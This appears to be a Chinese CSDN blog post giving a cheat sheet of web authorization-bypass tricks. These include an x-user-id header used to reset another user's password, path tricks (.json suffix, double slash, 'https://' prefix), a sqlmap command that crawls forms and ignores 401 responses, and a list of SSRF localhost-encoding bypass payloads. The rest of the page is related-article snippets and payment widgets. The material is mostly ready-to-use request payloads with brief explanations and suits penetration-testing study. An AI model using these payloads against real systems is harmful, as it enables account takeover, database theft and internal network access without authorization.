一文教你所有特殊越权方式越权

最新推荐文章于 2024-05-21 09:31:27 发布
最新推荐文章于 2024-05-21 09:31:27 发布
阅读量475 收藏 7
点赞数 8
文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52501704/article/details/135225363
版权

越权
1.利用 x-user-id
正常访问:GET /api/users/1337  -->401客户端错误
越权访问:GET /api/users/ x-user-id: 1337  -->200 Ok
利用方式:POST /api/users/自己id值/password-reset x-user-id: 别人id值
password-reset: 密码重置
原理:x-user-id可以让服务器读取这个特定的标头的值,由此使用内部变量来进行身份验证从而达到越权效果(由于API在处理带有自定义头部(如 x-user-id)的请求时存在逻辑错误。例如,API 可能错误地假设带有此类头部的请求已经通过了某种形式的验证。)


 

2.id后面加.json
request:
GET /api/users/1337.json
response:
200 success

原理:在一些 Web 框架中,路由可能会根据后缀(如 .json)的存在与否来不同地处理。如果权限在不同的路由中实现不一致,这可能导致特定路由变得更容易受到越权攻击。

3.url加双斜杠
正常访问:/api/6798556007/users --> 403
越权访问:/api/6798556007//users --> 200 OK

原理:同样路由解析漏洞

4.请求包加https
正常访问:
Request:
POST /user/password-reset/ HTTP 1.1
Host :http://attacker.com
Response:
403 , 404 : False
越权访问:
Request:
POST /https://user/password-reset/ HTTP 1.1
Host :http://attacker.com
Response:
200 , 302 : Success
password-reset: 密码重置
 

5.构造新的url
正常访问:Target/signup.php  --> 401客户端错误
越权访问:Target/index.php?page=signup  --> 200 OK

SQL注入

  1. sqlmap -u http://xxxx.com --forms --crawl=2 --dbs --ignore-code=401
    --forms  在目标URL上解析和测试表单
    --crawl=2 从起始位置爬取的深度,这里为2
    --dbs  获取数据库
    --ignore-code=401 无视http状态码,这里无视401状态

原理:当我们正常访问页面状态码提示401的时候只是说明没有访问权限而不是404不存在页面,所以此时我们可以使用sqlmap的爬虫功能爬出来这个页面上的表单进行注入测试

附:

SSRF绕过
http://127.1/
http://0000::1:80/
http://[::]:80/
http://2130706433/
http://whitelisted@127.0.0.1
http://0x7f000001/
http://017700000001
http://0177.00.00.01

H1111B
关注
  • 8
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
文教你用51单片机做蓝牙开关
01-19
1.首先是蓝牙APP, 易安卓编写的,说编写其实我只是修改了其中的一些内容,两张界面和代码截图,非常简单,功能也很简单,程序前后修改了两次主要地方,主要原因是测试 的时候发现种程序会出现错误,在单片机哪里会仔细说明!操作界面,很简单,打开之后打开蓝牙,然后点击搜索设备,找到你的模块名字,点击之后就可以连接了,连接之后下面会显示蓝牙的名称和地址信息   2.单片机程序, 这个程序也很简单,只要学过一些单片机程序的人应该都知道吧,串口通信,设置好通信的波特率,初始化工作做好,然后在串口中断程序里写上你要做的事情就可 以了,这里虽然说11.0592的晶振定时器初值为fd
文教你掌握检测电缆电阻的方法
01-20
直流电阻检测。 相关国家标准中有明确的规定:电线电缆的直流电阻须以每千米的导体电阻作为比较的基准,所测得的电线电缆的直流电阻数据必须先换算成 20℃的温度下每千米的直流电阻值。将测得的直流电阻数值换算成 20℃条件下的直流电阻值后,其数值若小于规定的标准值,那么该电线电缆样品即为合格产品,反之则属于不合格产品。 目前国内相关部门通常采用电桥法和电流法两种方法来测定电线电缆的直流电阻。电桥法的测量范围比较窄,可分单臂电桥法和臂电桥法,当电线电缆的电阻值约为 1 以上时采用单臂电桥法;当电线电缆电阻值小于 1 时则采用臂电桥法。电流法又称为微欧计法,其原理是根据电线电缆电阻值的大小,采用恒
文教你如何区别ARM Cortex系列处理器
01-19
众所周知,英国的ARM公司是嵌入式微处理器世界当中的佼佼者。ARM一直以来都是自己研发微处理器内核架构,然后将这些架构的知识产权授权给各个芯片厂商,精简的CPU架构,高效的处理能力以及成功的商业模式让ARM公司获得了巨大的成功,使它迅速占据了32位嵌入式微处理器的大部分市场份额。目前,随着对嵌入式系统的要求越来越高,作为其的嵌入式微处理器的综合性能也受到日益严峻的考验,现在一个高端智能手机的处理能力几乎可以和几年前的笔记本电脑相当。为了迎合市场的需求,ARM公司也在加紧研发他们的 ARM架构,Cortex系列就是这样的产品。那么我们今天就不妨好好了解一下ARM Cortex系列处理器知识点汇总
一文带你看清HTTP所有概念
02-24
先来回顾一下HTTP1.1标头都有哪几种HTTP1.1的标头主要分为四种,通用标头、实体标头、请求标头、响应标头,现在我们来对这几种标头进行介绍HTTP通用标头之所以这样命名,是因为与其他三个类别不同,它们不是限定于特定种类的消息或者消息组件(请求,响应或消息实体)的。HTTP通用标头主要用于传达有关消息本身的信息,而不是它所携带的内容。它们提供一般信息并控制如何处理和处理消息。尽管通用标头不会限定于是请求还是响应报文,但是某些通用标头大部分或全部用于一种特定类型的请求中。也就是说,如果某个通用标头出现在请求报文中,那么大部分通用标头都会显示在该请求报文中。响应报文也是一样的。先列出来一个清单
走进JavaWeb技术世界17:web安全攻防详解
Java技术江湖
03-17 3335
安全要素与 STRIDE 威胁 今天,来分享下安全要素与 STRIDE 威胁。 STRIDE 威胁 STRIDE 威胁,代表六种安全威胁:身份假冒(Spoofing)、篡改(Tampering)、抵赖(Repudiation)、信息泄露(Information Disclosure)、拒绝服务(Denial of Service)、特权提升(Elevation of Priv...
一文带你0基础挖到逻辑漏洞
2302_77203524的博客
07-21 327
逻辑漏洞
一文从容应对CSRF
初心不忘、始终方得
05-27 842
详述CSRF是什么,它的攻击原理,以及解决方案。并结合实际项目给出解决案例。
一文读懂十大数据存储加密技术
Chaincomp的博客
11-17 2037
数据作为新的生产要素,其蕴含的价值日益凸显,而安全问题却愈发突出。密码技术,是实现数据安全最经济、最有效、最可靠的手段,对数据进行加密,并结合有效的密钥保护手段,可在开放环境中实现对数据的强访问控制,从而让数据共享更安全、更有价值。随着《密码法》等“一法三规一条例”的落实,各行业对数据加密技术、产品和服务的重视程度不断提升。 本文聚焦十种数据存储加密技术,希望能够帮助读者快速了解数据存储加密技术的全貌,并在用户需要通过“加解密技术”进行自身核心数据资产的安全保护时,在场景适用性判断、相关技术与产品选型等方面
网络安全面经】渗透面经、安服面经、红队面经、hw面经应有尽有 这一篇真的够了
m0_62783065的博客
04-30 3940
hw临近,每到这时都是换业高峰期,整理一波面经请各位师傅过目。可以看牛客和GitHub一些师傅整理的。
规范报告中的漏洞名称以及修复建议
songbai220
04-21 711
规范报告中的漏洞名称以及修复建议
owasp top 10上的常见漏洞
qq_52929642的博客
10-05 257
声明本篇文章仅用于学习交流!!!如果有和我一样刚学的萌新也非常欢迎在评论区发表你自己的理解,我也会和你一起讨论学习,一起进步。
web安全测试用例(网络资源笔记)
天在等我,菜鸟想飞
12-30 5313
信息泄漏 robots.txt泄漏敏感信息 **漏洞描述:**搜索引擎可以通过robots文件可以获知哪些页面可以爬取,哪些页面不可以爬取。Robots协议是网站国际互联网界通行的道德规范,其目的是保护网站数据和敏感信息、确保用户个人信息和隐私不被侵犯,如果robots.txt文件编辑的太过详细,反而会泄露网站的敏感目录或者文件,比如网站后台路径,从而得知其使用的系统类型,从而有针对性地进行利用。 测试方法: 检测形式多样,工具爬虫扫描得到敏感文件的路径,从而找到robots文件; 手工挖掘,直接在域名后输
Web渗透-SQL注入
YangYubo091699的博客
08-05 1623
SQL注入
使用MPLS解决BGP的路由黑洞(详解)
qq_64302290的博客
05-18 234
我们知道在MPLS中数据的转发不再依靠路由表而是靠标签(注意:标签是在路由的基础上形成的)。所以在BGP中,我们依靠的就是这个特性来解决BGP的路由黑洞。BGP路由黑洞的解释:BGP的路由黑洞其实就是路由层面可达,数据层面不可达。(你可以收到对方的路由,但是不能和对方通讯。
计算机网络
zengkui198513的博客
05-15 314
上面的每一个问题是每一层都必须面对的也都必须要解决的。每一层而且必须要覆盖上面的信息!
云服务器遇到攻击怎么办,有哪些安全措施
dexunyun的博客
05-18 553
DDoS攻击对云服务器安全构成了严重威胁,但通过采取合适的防护策略,我们可以有效地降低攻击的影响。选择可靠的云服务提供商、部署DDoS防护服务是保护云服务器免受DDoS攻击的有效措施。德迅云安全提供了多种防护解决方案,可以帮助企业有效防止DDoS攻击,保护云服务器的安全,保障业务稳定。
netstat协议
lovemelovefish的博客
05-15 390
本机各端口的网络连接情况。
MQTT 异常断开(一)
最新发布
m0_50668851的博客
05-21 168
MQTT异分析问题总结 前提:MQTT是基于TCP层再次封装,MQTT是不关心TCP层的实现与传输,但是如果TCP链路出现异常(丢失TCP ACK,网络延时TCP ACK等)一定会导致MQTT断开连接。 MQTT代理服务器存在如下问题: a.代理服务器,对于连接时没有及时处理收到模块关于TCP层的 TCP ACK(Seq确认包),出现重传MQTT Connect Ack。模块内部MQTT的处理逻辑,NQTT收到Connect Ack之后,模块已经准备就绪,回码OK, 但是客户......
一文带你学会使用eclipse
05-03
在本文中,我将向你展示如何使用Eclipse进行Java开发。 1. 下载Eclipse 首先,你需要从Eclipse官方网站下载Eclipse IDE。下载页面上将提供几个不同的版本,包括Eclipse IDE for Java Developers、Eclipse IDE for ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值